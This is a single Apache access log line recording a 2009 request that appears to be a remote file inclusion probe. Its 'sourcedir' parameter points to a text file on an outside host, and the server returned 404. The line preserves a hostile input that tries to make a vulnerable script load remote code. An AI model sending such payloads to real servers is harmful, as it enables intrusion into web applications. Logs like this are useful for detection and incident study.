220.231.126.252 - - [03/Aug/2009:03:31:07 -0400] "GET /logs/access_log.Q109052300%20%20/?sourcedir=http://www.snyder.esc14.net/applications/calendar/ic/IMG/idade1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
